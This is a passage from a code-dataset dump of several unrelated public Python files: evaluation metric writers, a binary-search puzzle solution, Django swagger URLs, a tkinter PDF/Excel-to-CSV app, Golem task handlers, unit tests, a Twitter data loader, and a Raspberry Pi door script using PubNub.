open(os.path.join(save_dir, 'ACER_enc_all.txt'), 'w') as f:\n f.write('ACER_enc_all\\n')\n for i, acer in enumerate(ACER_enc_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_enc_cls.txt'), 'w') as f:\n f.write('threshold_all_enc_cls\\n')\n for i, threshold in enumerate(threshold_all_enc_cls):\n f.write('%f\\n' % (threshold))\n\n ## classification based on the estimated depth map\n with open(os.path.join(save_dir, 'ACC_dec_all.txt'), 'w') as f:\n f.write('ACC_dec_all\\n')\n for i, acc in enumerate(ACC_dec_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_dec_all.txt'), 'w') as f:\n f.write('APCER_dec_all\\n')\n for i, apcer in enumerate(APCER_dec_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_dec_all.txt'), 'w') as f:\n f.write('BPCER_dec_all\\n')\n for i, bpcer in enumerate(BPCER_dec_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_dec_all.txt'), 'w') as f:\n f.write('ACER_dec_all\\n')\n for i, acer in enumerate(ACER_dec_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_depth_cls.txt'), 'w') as f:\n f.write('threshold_all_depth_cls\\n')\n for i, threshold in enumerate(threshold_all_depth_cls):\n f.write('%f\\n' % (threshold))\n\n with open(os.path.join(save_dir, 'ACC_all.txt'), 'w') as f:\n f.write('ACC_all\\n')\n for i, acc in enumerate(ACC_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_all.txt'), 'w') as f:\n f.write('APCER_all\\n')\n for i, apcer in enumerate(APCER_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_all.txt'), 'w') as f:\n f.write('BPCER_all\\n')\n for i, bpcer in enumerate(BPCER_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_all.txt'), 'w') as f:\n f.write('ACER_all\\n')\n for i, acer in enumerate(ACER_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all.txt'), 'w') as f:\n f.write('threshold_all\\n')\n for i, threshold in enumerate(threshold_all):\n f.write('%f\\n' % (threshold))\n\n ## classification by the encoder/transformer\n with open(os.path.join(save_dir, 'ACC_enc_all.txt'), 'w') as f:\n f.write('ACC_enc_all\\n')\n for i, acc in enumerate(ACC_enc_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_enc_all.txt'), 'w') as f:\n f.write('APCER_enc_all\\n')\n for i, apcer in enumerate(APCER_enc_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_enc_all.txt'), 'w') as f:\n f.write('BPCER_enc_all\\n')\n for i, bpcer in enumerate(BPCER_enc_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_enc_all.txt'), 'w') as f:\n f.write('ACER_enc_all\\n')\n for i, acer in enumerate(ACER_enc_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_enc_cls.txt'), 'w') as f:\n f.write('threshold_all_enc_cls\\n')\n for i, threshold in enumerate(threshold_all_enc_cls):\n f.write('%f\\n' % (threshold))\n\n ## classification based on the estimated depth map\n with open(os.path.join(save_dir, 'ACC_dec_all.txt'), 'w') as f:\n f.write('ACC_dec_all\\n')\n for i, acc in enumerate(ACC_dec_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_dec_all.txt'), 'w') as f:\n f.write('APCER_dec_all\\n')\n for i, apcer in enumerate(APCER_dec_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_dec_all.txt'), 'w') as f:\n f.write('BPCER_dec_all\\n')\n for i, bpcer in enumerate(BPCER_dec_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_dec_all.txt'), 'w') as f:\n f.write('ACER_dec_all\\n')\n for i, acer in enumerate(ACER_dec_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_depth_cls.txt'), 'w') as f:\n f.write('threshold_all_depth_cls\\n')\n for i, threshold in enumerate(threshold_all_depth_cls):\n f.write('%f\\n' % (threshold))\n\n ## classification based on the vote results\n with open(os.path.join(save_dir, 'ACC_vote_all.txt'), 'w') as f:\n f.write('ACC_vote_all\\n')\n for i, acc in enumerate(ACC_vote_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_vote_all.txt'), 'w') as f:\n f.write('APCER_vote_all\\n')\n for i, apcer in enumerate(APCER_vote_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_vote_all.txt'), 'w') as f:\n f.write('BPCER_vote_all\\n')\n for i, bpcer in enumerate(BPCER_vote_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_vote_all.txt'), 'w') as f:\n f.write('ACER_vote_all\\n')\n for i, acer in enumerate(ACER_vote_all):\n f.write('%f\\n' % (acer))\n\n\n return\n\nif __name__ == '__main__':\n\n config = json.load(open(args.config))\n config['config'] = args.config\n\n\n main_worker(config)\n","repo_name":"fangwei00-jin/ViTransPAD","sub_path":"evaluate_mtl.py","file_name":"evaluate_mtl.py","file_ext":"py","file_size_in_byte":15375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26273455333","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\narr = list(map(int, input().split()))\n\nstart = 0\nend = max(arr)\nr = 0\nt = 0\nwhile end - start >= 0:\n mid = (end + start) // 2\n s = 0\n for i in range(n):\n if arr[i] - mid >= 0:\n s += arr[i] - mid\n if s > m:\n start = mid+1\n elif s < m:\n end = mid-1\n # print(mid)\n if r == mid:\n break\n r = mid\nprint(r)","repo_name":"sihyeokpark/Baekjoon","sub_path":"baekjoon/silver/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"21655978880","text":"\"\"\"Module with urls for swagger documentation.\"\"\"\nfrom django.urls import path\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework.permissions import AllowAny\n\nschema_view = get_schema_view(\n openapi.Info(\n '한국어를 공부 API',\n default_version='1.0',\n contact=openapi.Contact(\n email='rafayt323@gmail.com',\n url='https://t.me/rafailka_m',\n ),\n ),\n public=True,\n permission_classes=(AllowAny,),\n)\n\nurlpatterns = (\n path(\n 'swagger/',\n schema_view.without_ui(),\n name='schema-json',\n ),\n path('swagger/', schema_view.with_ui(), name='schema-swagger-ui'),\n)\n","repo_name":"rafailmdzdv/hangugeoreul-gongbuhaeyo","sub_path":"src/server/apps/swagger/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7254114307","text":"import os\nimport webbrowser\nfrom pathlib import Path\nimport subprocess\nimport tkinter as tk\nfrom tkinter import Button, Toplevel, filedialog, messagebox, Text, INSERT\nfrom extractor.extractor import Extractor\n\n\nclass Application(tk.Frame):\n\n FILEBROWSER_PATH = os.path.join(os.getenv('WINDIR'), 'explorer.exe')\n\n def __init__(self, master):\n super().__init__(master)\n self.pack(padx=10, pady=10)\n self.selected_index = 0\n self.create_widgets()\n self.extractor = Extractor()\n self.result = None\n self.shipments = []\n self.file_scanned = False\n\n def create_widgets(self):\n \"\"\"Creates and grid/pack all tkinter widget\n which will be rendered on screen.\n \"\"\"\n # Scanning frame\n self.frame_presentation = tk.Frame(self, pady=5)\n self.frame_presentation.grid(\n row=0, column=0, columnspan=3, sticky=\"we\")\n\n # Presentation label, explaining program\n presentation_label_txt = \"Escáner de archivos PDF \" + \\\n \"de MercadoLibre o TiendaNube, o XLSX (Excel) \" + \\\n \"con formato específico.\"\n self.presentation_label = tk.Label(\n self.frame_presentation,\n text=presentation_label_txt, padx=5, pady=10)\n self.presentation_label.pack()\n\n # Open Excel instructions.\n self.excel_instructions = tk.Button(\n self.frame_presentation, text='Ayuda sobre Excel', padx=15,\n command=self.__open_excel_instructions)\n self.excel_instructions.pack(side=tk.LEFT)\n\n # Scanning frame\n self.frame_0 = tk.Frame(self, pady=5)\n self.frame_0.grid(row=1, column=0, columnspan=3, sticky=\"we\")\n\n # Just a label\n self.entry_file_label = tk.Label(\n self.frame_0, text=\"Elegir archivo\", padx=5, pady=10)\n self.entry_file_label.grid(row=0, column=0, sticky=\"w\")\n\n # Entry for filepath\n self.entry_file = tk.Entry(self.frame_0, width=60)\n self.entry_file.grid(row=0, column=1, sticky=\"ew\")\n\n # Just space\n self.row_0_space = tk.Label(self.frame_0, padx=1)\n self.row_0_space.grid(row=0, column=2)\n\n # Select file button\n self.entry_file_button = tk.Button(\n self.frame_0, text=\"...\", height=1,\n padx=10, command=self.__select_file)\n self.entry_file_button.grid(row=0, column=3)\n\n # Scanning frame\n self.frame = tk.Frame(self, pady=5)\n self.frame.grid(row=2, column=0, columnspan=4, sticky=\"we\")\n\n # Scan explanation label\n explanation = \"Presioná \\\"Escanear\\\" para buscar los\" + \\\n \" envíos en el archivo\"\n self.status_label = tk.Label(self.frame, text=explanation)\n self.status_label.pack()\n\n # Scann for Shipments' data button\n self.entry_file_button = tk.Button(\n self.frame, text=\"Escanear\", height=1, padx=10,\n command=self.__convert)\n self.entry_file_button.pack()\n\n # Scanning status label\n self.status_label = tk.Label(self.frame, text=\"En espera\")\n self.status_label.pack()\n\n # Export frame\n self.export_frame = tk.LabelFrame(\n self, text=\"Exportación\", pady=10, padx=10)\n self.export_frame.grid(row=3, column=0, columnspan=3)\n\n # Copy to clipboard\n self.copy_button = tk.Button(\n self.export_frame, text=\"Copiar\", padx=15,\n command=lambda: self.__copy_to_clipboard(self.result))\n self.copy_button.pack(side=tk.LEFT)\n\n # Export to CSV\n self.export_csv = tk.Button(\n self.export_frame, text='Exportar a CSV', padx=15,\n command=lambda: self.__export('csv'))\n self.export_csv.pack(side=tk.LEFT)\n\n # # Export to TXT\n self.export_txt = tk.Button(\n self.export_frame, text='Exportar a TXT', padx=15,\n command=lambda: self.__export('txt'))\n self.export_txt.pack(side=tk.LEFT)\n\n # Open export string as dialog\n self.export_dialog = tk.Button(\n self.export_frame, text='Ventana de diálogo', padx=15,\n command=self.__open_as_dialog)\n self.export_dialog.pack(side=tk.LEFT)\n\n # self.columnconfigure(1, weight=1)\n # self.columnconfigure(0, weight=1)\n\n self.__disable_buttons()\n return\n\n def __disable_buttons(self):\n self.all_buttons = [self.copy_button,\n self.export_csv,\n self.export_txt,\n self.export_dialog]\n for btn in self.all_buttons:\n btn['state'] = 'disabled'\n return\n\n def __enable_buttons(self):\n self.all_buttons = [self.copy_button,\n self.export_csv,\n self.export_txt,\n self.export_dialog]\n for btn in self.all_buttons:\n btn['state'] = 'normal'\n return\n\n def __select_file(self):\n \"\"\"Runs an Open File Dialog for PDF selecting\n \"\"\"\n try:\n downloads_path = str(Path.home() / \"Downloads\")\n self.filename = filedialog.askopenfilename(\n # initialdir=\"C:/\", title=\"Seleccioná un archivo PDF\",\n initialdir=downloads_path, title=\"Seleccioná un archivo PDF\",\n filetypes=((\"PDF, CSV, Excel\", \"*.*\"),)\n )\n if self.filename:\n self.entry_file.delete(0, 'end')\n self.entry_file.insert(0, self.filename)\n return\n except Exception as e:\n self.__disable_buttons()\n self.__popup(e)\n\n def __convert(self):\n \"\"\"Performs the conversion from file to a csv string\n representing the MercadoLibre's shipments.\n \"\"\"\n if len(self.entry_file.get()) > 0:\n try:\n self.__disable_buttons()\n self.__show_in_progress()\n extraction = self.extractor.get_shipments(\n self.entry_file.get())\n self.result, self.total_count = extraction\n self.file_scanned = True\n self.__show_success()\n self.__enable_buttons()\n\n except Exception as e:\n self.__show_error()\n return self.__popup(e)\n else:\n return self.__popup(\"Ningún archivo seleccionado para escanear.\")\n\n def __show_error(self):\n \"\"\"Displays an error message\n \"\"\"\n self.status_label.config(\n text='Error al obtener los datos', fg=\"#F00\")\n return\n\n def __show_in_progress(self):\n \"\"\"Displays File convertion in progress\n \"\"\"\n self.status_label.config(text='Procesando...', fg=\"#000\")\n return\n\n def __show_success(self):\n \"\"\"Displays File has been successfully converted.\n \"\"\"\n t = f'Éxito! {self.total_count} envíos encontrados!'\n self.status_label.config(text=t, fg=\"#008000\")\n return\n\n def __popup(self, message):\n \"\"\"Displays error popup with the message provided\n parsed to string.\n\n Args:\n message (Any)\n \"\"\"\n error_title = \"Ha ocurrido un error\"\n error_message = \"Error: \" + str(message)\n messagebox.showerror(error_title, error_message)\n return\n\n def __export(self, extension: str):\n \"\"\"Performs the export to a file in the provided extension with shipments\n formatted in CSV-style.\n Asks for filename and path to save to.\n\n Args:\n extension (str): file extension (csv, txt).\n\n Returns:\n A popup error if pdf hasn't been converted yet, or a\n popup error displaying the exception, or nothing\n if there wasn't any filepath to save to.\n \"\"\"\n if not self.file_scanned:\n return self.__popup(\"Todavía no se escaneó ningún PDF\")\n try:\n file = filedialog.asksaveasfile(\n mode='w', defaultextension=f'*.{extension}',\n filetypes=((extension.upper(), f'*.{extension}'),\n (\"Todos los archivos\", \"*.*\")))\n\n # asksaveasfile return `None` if dialog closed with \"cancel\".\n if file is None:\n return\n\n file.write(self.result)\n file.close()\n name = file.name\n last_slash_index = name.rfind('/')\n path = name[:last_slash_index]\n return self.__explore(path)\n except Exception as e:\n self.__popup(e)\n\n def __open_excel_instructions(self):\n path = os.path.abspath(os.getcwd())\n filename = path + \"\\\\excel_instructions.html\"\n return webbrowser.open('file://' + os.path.realpath(filename))\n\n def __open_txt_as_dialog(self, txt, big=None):\n \"\"\"Displays text in a new tkinter window.\n \"\"\"\n top = Toplevel()\n my_label = Text(top)\n my_label.insert(INSERT, txt)\n my_label.pack()\n if big:\n top.resizable(False, False)\n return top\n\n def __open_as_dialog(self):\n \"\"\"Displays all shipments parsed to full str in CSV-style\n in a new tkinter window.\n\n Returns:\n A popup error if pdf hasn't been converted yet\n \"\"\"\n if not self.file_scanned:\n return self.__popup(\"Todavía no se escaneó ningún PDF\")\n top = self.__open_txt_as_dialog(self.result)\n btn = Button(top, text=\"Copiar\",\n command=lambda: self.__copy_to_clipboard(\n self.result))\n btn.pack()\n return\n\n def __copy_to_clipboard(self, txt: str):\n \"\"\"Copies to clipboard displayed shipments parsed to full str\n in CSV-style displayed in new tkinter window.\n\n Args:\n txt (Str): Text to copy.\n \"\"\"\n self.clipboard_clear()\n self.clipboard_append(txt)\n # now it stays on the clipboard after the window is closed\n self.update()\n return\n\n def __explore(self, path: str):\n \"\"\"Opens File Explorer at provided path.\n\n Args:\n path (str): to open File Explorer to.\n \"\"\"\n # explorer would choke on forward slashes\n path = os.path.normpath(path)\n if os.path.isdir(path):\n subprocess.run([self.FILEBROWSER_PATH, path])\n elif os.path.isfile(path):\n subprocess.run(\n [self.FILEBROWSER_PATH, '/select,', os.path.normpath(path)])\n\n\ndef main():\n try:\n root = tk.Tk()\n root.geometry(\"580x330\")\n root.title(\"File2CSV\")\n root.resizable(False, False)\n path = os.path.abspath(os.getcwd())\n icon = path + \"\\\\file2csv.gif\"\n img = tk.PhotoImage(file=icon)\n root.tk.call('wm', 'iconphoto', root._w, img)\n app = Application(root)\n app.mainloop()\n except Exception as e:\n logpath = os.path.abspath(os.getcwd()) + \"\\\\log.txt\"\n with open(logpath, 'a') as txt:\n txt.write(str(e) + \"\\n\")\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EkoTunde/file2csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71309836096","text":"import shutil\nimport uuid\nimport zipfile\n\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple\n\nimport golem_task_api as api\nfrom golem_task_api.apputils.task import SubtaskStatus\nfrom golem_task_api.dirutils import RequestorTaskDir, ProviderTaskDir\nfrom golem_task_api.enums import VerifyResult\nfrom golem_task_api.envs import DOCKER_CPU_ENV_ID\nfrom golem_task_api.structs import Infrastructure, Task\n\nfrom . import proof_of_work\nfrom .task_manager import TaskManager, PREREQUISITES\n\n\ndef _read_zip_contents(path: Path) -> str:\n with zipfile.ZipFile(path, 'r') as file:\n input_file = file.namelist()[0]\n with file.open(input_file) as inner_file:\n return inner_file.read().decode('utf-8')\n\n\nasync def create_task(\n work_dir: RequestorTaskDir,\n max_part_count: int,\n task_params: dict,\n) -> Task:\n # validate the 'difficulty' parameter\n difficulty = int(task_params['difficulty'])\n if difficulty < 0:\n raise ValueError(f\"difficulty={difficulty}\")\n # check whether resources were provided\n resources = task_params.get('resources')\n if not resources:\n raise ValueError(f\"resources={resources}\")\n # read the input file\n try:\n task_input_file = work_dir.task_inputs_dir / resources[0]\n input_data = task_input_file.read_text('utf-8')\n except (IOError, StopIteration) as exc:\n raise ValueError(f\"Invalid resource file: {resources} ({exc})\")\n # create the task\n task_manager = TaskManager(work_dir)\n task_manager.create_task(max_part_count)\n # update the parts with input data\n for num in range(max_part_count):\n part = task_manager.get_part(num)\n part.input_data = input_data + str(uuid.uuid4())\n part.difficulty = difficulty + (difficulty % 2)\n part.save()\n\n return Task(\n env_id=DOCKER_CPU_ENV_ID,\n prerequisites=PREREQUISITES,\n inf_requirements=Infrastructure(min_memory_mib=50.))\n\n\nasync def abort_task(\n work_dir: RequestorTaskDir,\n) -> None:\n task_manager = TaskManager(work_dir)\n task_manager.abort_task()\n\n\nasync def abort_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str\n) -> None:\n task_manager = TaskManager(work_dir)\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.ABORTED)\n\n\nasync def next_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str,\n) -> Optional[api.structs.Subtask]:\n task_manager = TaskManager(work_dir)\n\n part_num = task_manager.get_next_computable_part_num()\n if part_num is None:\n return None\n part = task_manager.get_part(part_num)\n\n # write subtask input file\n subtask_input_file = work_dir.subtask_inputs_dir / f'{subtask_id}.zip'\n with zipfile.ZipFile(subtask_input_file, 'w') as file:\n file.writestr(subtask_id, part.input_data)\n\n resources = [subtask_input_file.name]\n task_manager.start_subtask(part_num, subtask_id)\n\n return api.structs.Subtask(\n params={\n 'difficulty': part.difficulty,\n 'resources': resources,\n },\n resources=resources,\n )\n\n\nasync def verify_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str,\n) -> Tuple[VerifyResult, Optional[str]]:\n\n subtask_outputs_dir = work_dir.subtask_outputs_dir(subtask_id)\n output_data = _read_zip_contents(subtask_outputs_dir / f'{subtask_id}.zip')\n\n provider_result, provider_nonce_str = output_data.rsplit(' ', maxsplit=1)\n provider_nonce = int(provider_nonce_str)\n\n # verify hash\n task_manager = TaskManager(work_dir)\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.VERIFYING)\n\n try:\n part_num = task_manager.get_part_num(subtask_id)\n part = task_manager.get_part(part_num)\n\n proof_of_work.verify(\n part.input_data,\n difficulty=part.difficulty,\n against_result=provider_result,\n against_nonce=provider_nonce)\n\n shutil.copy(\n subtask_outputs_dir / f'{subtask_id}.zip',\n work_dir.task_outputs_dir / f'{subtask_id}.zip')\n except (AttributeError, ValueError) as err:\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.FAILURE)\n return VerifyResult.FAILURE, str(err)\n\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.SUCCESS)\n return VerifyResult.SUCCESS, None\n\n\nasync def discard_subtasks(\n work_dir: RequestorTaskDir,\n subtask_ids: List[str],\n) -> List[str]:\n task_manager = TaskManager(work_dir)\n for subtask_id in subtask_ids:\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.ABORTED)\n return subtask_ids\n\n\nasync def has_pending_subtasks(\n work_dir: RequestorTaskDir,\n) -> bool:\n task_manager = TaskManager(work_dir)\n return task_manager.get_next_computable_part_num() is not None\n\n\nasync def run_benchmark() -> float:\n return await api.threading.Executor.run(proof_of_work.benchmark)\n\n\nasync def compute_subtask(\n work_dir: ProviderTaskDir,\n subtask_id: str,\n subtask_params: dict,\n) -> Path:\n # validate params\n resources = subtask_params['resources']\n if not resources:\n raise ValueError(f\"resources={resources}\")\n difficulty = int(subtask_params['difficulty'])\n if difficulty < 0:\n raise ValueError(f\"difficulty={difficulty}\")\n\n # read input data\n subtask_input_file = work_dir.subtask_inputs_dir / resources[0]\n subtask_input = _read_zip_contents(subtask_input_file)\n\n # execute computation\n hash_result, nonce = await api.threading.Executor.run(\n proof_of_work.compute,\n input_data=subtask_input,\n difficulty=difficulty)\n\n # bundle computation output\n subtask_output_file = work_dir / f'{subtask_id}.zip'\n with zipfile.ZipFile(subtask_output_file, 'w') as file:\n file.writestr(subtask_id, f'{hash_result} {nonce}')\n\n return subtask_output_file.name\n","repo_name":"golemfactory/tutorialapp","sub_path":"image/tutorial_app/tutorial_app/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37130292814","text":"import unittest\nimport random\nfrom util_import import set_imports\nset_imports()\nfrom point import Point\n\n\nclass PointTests(unittest.TestCase):\n \n def test_dataAccess(self):\n x = random.randint(-2e6, 2e6)\n y = random.randint(-2e6, 2e6)\n point = Point(x, y)\n self.assertEqual(point.x, x)\n self.assertEqual(point.y, y)\n\n def test_equivalence(self):\n x = random.randint(-2e6, 2e6)\n y = random.randint(-2e6, 2e6)\n pointA = Point(x, y)\n pointB = Point(x, y)\n pointC = Point(x + 1, y)\n pointD = Point(x, y + 1)\n self.assertEqual(pointA, pointB)\n self.assertNotEqual(pointA, pointC)\n self.assertNotEqual(pointA, pointD)\n self.assertNotEqual(pointD, pointC)\n\nif __name__==\"__main__\":\n unittest.main()","repo_name":"reizy/spacerace-clients","sub_path":"python/tests/tests_point.py","file_name":"tests_point.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28962815284","text":"import json\nimport re\nimport pandas as pd\n\nclass TaskManager:\n \"\"\"\n Utility class for defining labels and reading data tables (.csv, .tsv, ...) and returning the input texts and gold labels\n \"\"\"\n\n def __init__(self, task_file, logdir=None):\n\n # define dictionary of data-reading functions\n self.data_reading_functions = {\n \"twitter_features_gender_bio\": TaskManager.twitter_features_gender_bio,\n \"twitter_features_gender_bio_tweets\": TaskManager.twitter_features_gender_bio_tweets,\n \"twitter_features_age_bio\": TaskManager.twitter_features_age_bio,\n \"twitter_features_age_bio_tweets\": TaskManager.twitter_features_age_bio_tweets,\n \"twitter_features_age_interval_bio\": TaskManager.twitter_features_age_interval_bio,\n \"twitter_features_age_interval_bio_tweets\": TaskManager.twitter_features_age_interval_bio_tweets,\n \"twitter_features_extra_nogold\": TaskManager.twitter_features_extra_nogold,\n }\n\n # read task specs from json task_file\n self.task = json.load(open(task_file, 'r'))\n # setup labels\n self.labels = self.task['labels']\n self.label_dims = self.task['label_dims'] if 'label_dims' in self.task else 1\n self.default_label = list(self.labels.keys())[0] if self.label_dims == 1 else list(self.labels['dim1'].keys())[0]\n # setup data reading function\n if self.task['read_function'] in self.data_reading_functions:\n self.read_data = self.data_reading_functions[self.task['read_function']]\n else:\n raise ValueError(\n f\"Data-reading function '{self.task['read_function']}' not supported.\"\n f\"Supported functions: {self.data_reading_functions.keys()}\"\n )\n\n @staticmethod\n def twitter_features(\n path_data: str,\n include_bio=True,\n include_tweets=True,\n label_name='is_male',\n ):\n # Read the pickle dataframe\n if path_data.endswith('.pkl'):\n df = pd.read_pickle(path_data)\n else:\n raise NotImplementedError\n # Set the index to the user_id\n df.set_index('user_id', inplace=True)\n # check if there are any missing values (shouldn't be the case)\n if df.isnull().values.any():\n raise ValueError('The dataframe contains missing values')\n # Read each bio and tweets concatenation, splitting them by \\n and\n # joining by '. ' if sentences don't already end with a dot, else join by ' '\n if include_bio:\n df.masked_bio = df.masked_bio.apply(lambda x: [text + '.' if not (text.endswith('.') or text.endswith('!') or text.endswith('?') or text.endswith(';')) else text for text in x.split('\\n')]).apply(lambda x: ' '.join(x)).apply(lambda x: re.sub('\\r', '', x)).tolist()\n if include_tweets:\n df.long_text = df.long_text.apply(lambda x: [text + '.' if not (text.endswith('.') or text.endswith('!') or text.endswith('?') or text.endswith(';')) else text for text in x.split('\\n')]).apply(lambda x: ' '.join(x)).apply(lambda x: re.sub('\\r', '', x)).tolist()\n if include_bio and include_tweets:\n # Join each tweet and bio by 'Bio: ' and 'Tweets: '\n input_texts = df.apply(lambda x: 'Bio: ' + x.masked_bio + '\\nTweets: ' + x.long_text, axis=1)\n elif include_bio:\n input_texts = df.apply(lambda x: 'Bio: ' + x.masked_bio, axis=1)\n elif include_tweets:\n input_texts = df.apply(lambda x: 'Tweets: ' + x.long_text, axis=1)\n\n # Read the gold labels\n if label_name == 'is_male':\n gold_labels = df[[label_name]]\n gold_labels[label_name] = gold_labels[label_name].apply(lambda x: 'male' if x==True else 'female')\n if label_name == 'age':\n gold_labels = df[[label_name]]\n gold_labels[label_name] = gold_labels[label_name].astype('int')\n if label_name == 'age_interval':\n # define age classes\n age_intervals = [0, 19, 30, 40, 100]\n age_labels = [0, 1, 2, 3]\n # Discretize the 'age' column into four classes\n gold_labels = pd.cut(df['age'], bins=age_intervals, labels=age_labels, right=False).astype('str')\n \n return input_texts, gold_labels\n\n @staticmethod\n def twitter_features_extra_nogold(\n path_data: str,\n ):\n\n # Read the pickle dataframe\n if path_data.endswith('.pkl'):\n df = pd.read_pickle(path_data)\n else:\n raise NotImplementedError\n\n # Set the index to the user_id\n df.set_index('user_id', inplace=True)\n # create input text\n # Separating text and numbers with a space\n df['username_sep'] = df['username'].str.replace(r'([a-zA-Z])(\\d)', r'\\1 \\2').\\\n str.replace(r'(\\d)([a-zA-Z])', r'\\1 \\2')\n # concat info\n df['input_texts'] = 'NAME:' + ' \"' + df['full_name'] + '\". ' +\\\n 'USERNAME:' + ' \"'+ df['username_sep'] + '\". ' + \\\n 'JOINED:' + ' \"' + df['join_year'].astype(str) + '\". ' +\\\n 'TWEETS:' + ' \"' + df['tweets'].astype(str) + '\". ' + \\\n 'FOLLOWING:' + ' \"' + df['following'].astype(str) + '\". ' +\\\n 'FOLLOWERS:' + ' \"' + df['followers'].astype(str) + '\". ' + \\\n 'BIO:' + ' \"' + df['bio'] + '\". ' + \\\n 'TEXT:' + ' \"' + df['long_text'] + '\".'\n\n # check if there are any missing values in input texts (shouldn't be the case)\n if df.input_texts.isnull().values.any():\n raise ValueError('The dataframe contains missing input_texts')\n\n return df['input_texts'], None\n\n @staticmethod\n def twitter_features_gender_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='is_male')\n\n @staticmethod\n def twitter_features_gender_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='is_male')\n\n @staticmethod\n def twitter_features_age_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='age')\n\n @staticmethod\n def twitter_features_age_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='age')\n\n @staticmethod\n def twitter_features_age_interval_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='age_interval')\n\n @staticmethod\n def twitter_features_age_interval_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='age_interval')\n","repo_name":"lorelupo/twitter_user_classification","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21397026028","text":"#!/usr/bin/env python3\n########################################################################\n# Filename : UltrasonicRanging.py\n# Description : Get distance via UltrasonicRanging sensor\n# Author : www.freenove.com\n# modification: 2019/12/28\n########################################################################\nimport RPi.GPIO as GPIO\nimport time\nimport requests\nfrom pubnub.pubnub import PubNub, SubscribeListener, SubscribeCallback, PNStatusCategory \nfrom pubnub.pnconfiguration import PNConfiguration \nfrom pubnub.exceptions import PubNubException\nimport pubnub \nimport numpy as np\n\ntrigPin = 16\nechoPin = 18\nMAX_DISTANCE = 220 # define the maximum measuring distance, unit: cm\ntimeOut = MAX_DISTANCE*60 # calculate timeout according to the maximum measuring distance\n\nmotorPins = (7, 11, 13, 15) # define pins connected to four phase ABCD of stepper motor\nCCWStep = (0x01,0x02,0x04,0x08) # define power supply order for rotating anticlockwise \nCWStep = (0x08,0x04,0x02,0x01) # define power supply order for rotating clockwise\n\ndef Whoishere(name,count):\n pnconf = PNConfiguration() \n pnconf.publish_key = 'pub-c-09e8cb71-5f5f-4f9d-9826-8ac234ced3b5' \n pnconf.subscribe_key = 'sub-c-0f975440-22ff-11ec-880d-a65b09ab59bc' \n pnconf.uuid='CPS14'\n pubnub = PubNub(pnconf) \n \n channel='CPS14'\n data = {\n 'message': '{} is here. Opening the door. Total number of People inside are {} '.format(name,count) \n }\n my_listener = SubscribeListener() \n pubnub.add_listener(my_listener) \n pubnub.subscribe().channels(channel).execute() \n my_listener.wait_for_connect() \n print('connected') \n pubnub.publish().channel(channel).message(data).sync() \n result = my_listener.wait_for_message_on(channel) \n print(result.message)\n moveSteps(1,3,512) # rotating 360 deg clockwise, a total of 2048 steps in a circle, 512 cycles\n time.sleep(5)\n moveSteps(0,3,512) # rotating 360 deg anticlockwise\n\ndef 